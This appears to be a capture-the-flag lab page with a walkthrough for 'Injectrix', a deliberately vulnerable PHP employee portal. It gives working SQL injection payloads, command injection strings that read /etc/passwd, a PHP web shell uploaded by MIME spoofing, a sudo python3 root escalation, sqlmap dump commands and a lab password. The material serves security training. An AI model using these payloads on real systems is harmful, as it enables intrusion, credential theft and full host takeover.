🐀🐀🐀 0 pts earned

Injectrix

An internal employee portal shipped to production without a security review. Three unpatched vulnerabilities sit in the same PHP codebase — SQL injection, command injection, and an unrestricted file upload. Chain them to own the box.

Target IP Log in to reveal

User Flag Pending

Root Flag Pending

Premium

Walkthrough, Tips and Tricks

Walkthrough

Objective

Exploit three web vulnerabilities chained together to gain user and root access.

Attack Narrative

IntraPortal was rushed into production. The login form is vulnerable to SQL injection, the admin diagnostics panel passes user input directly to a shell, and the file upload handler trusts browser-supplied MIME types. Any one of these gets you a foothold — combining them demonstrates real attack depth.

Prerequisites

Ability to craft SQL injection payloads (authentication bypass and UNION extraction).
Familiarity with OS command injection via HTTP parameters.
Knowledge of MIME-type spoofing in file uploads.
SSH client for post-foothold access.

Phase 1: Web Application Enumeration

Run a directory/content scan against port 80:

gobuster dir -u http://TARGET/ -w /usr/share/wordlists/dirb/common.txt

Browse the login page — note the form fields and POST action.
Inspect page source for developer comments and hints.

Phase 2: SQL Injection — Authentication Bypass

The login query is constructed by direct string concatenation.

Bypass login (no credentials needed):

Username: ' OR '1'='1'-- -
Password: anything

Alternatively, extract credentials via UNION:

Username: ' UNION SELECT 1,username,password,'x' FROM users-- -
Password: anything

This dumps the users table and reveals labuser's SSH password in plaintext.

Phase 3: Admin Panel — OS Command Injection

After login, navigate to Diagnostics. The host parameter is passed unsanitised to shell_exec("ping -c 2 <HOST>").

# Confirm injection
?tab=diag&host=127.0.0.1;id

# Read user flag directly (alternative to SSH)
?tab=diag&host=127.0.0.1;cat+/home/labuser/user.txt

Phase 4: SSH Foothold — User Flag

The Config tab reveals the service account credentials (or use UNION SQLi to extract them):

Username: labuser
Password: WebL4b!2024

ssh labuser@TARGET
cat ~/user.txt

Phase 5: File Upload — PHP Web Shell (Bonus)

The upload handler checks only Content-Type, not the file extension:

# Create a minimal PHP shell
echo '<?php system($_GET["cmd"]); ?>' > shell.php

# Upload with spoofed Content-Type
curl -s -F "file=@shell.php;type=image/jpeg"      "http://TARGET/?action=upload&tab=upload"

# Execute commands via the web shell
curl "http://TARGET/uploads/shell.php?cmd=id"

Phase 6: Privilege Escalation — sudo python3

sudo -l
# labuser may run: /usr/bin/python3 as root (NOPASSWD)

sudo python3 -c 'import os; os.execl("/bin/bash", "bash")'
cat /root/root.txt

Troubleshooting

SQLi bypass not working: verify comment syntax — try -- -, #, /**/.
Command injection blocked: check for WAF/filter — try %3B (URL-encoded semicolon).
Upload rejected: confirm Content-Type: image/jpeg is sent and not overridden by the client.
SSH password rejected: re-extract via UNION injection; check for trailing whitespace.

Verification Checklist

SQLi was proven and documented with a reproducible payload.
User flag captured from SSH session.
Root flag captured after sudo python3 escalation.

Tips and Tricks

Always check page source — developer comments often leak critical info.
For SQL injection, test single quote first, then boolean, then UNION.
Command injection: semicolon, pipe, backtick, $() are all separators.
MIME-type upload bypass: the server cannot verify what file type you actually sent.

Useful Commands

sqlmap -u "http://TARGET/?action=login" --data "username=a&password=b" --dump
curl -s "http://TARGET/?action=dashboard&tab=diag&host=127.0.0.1;cat+/etc/passwd"
curl -F "file=@shell.php;type=image/jpeg" "http://TARGET/?action=upload&tab=upload"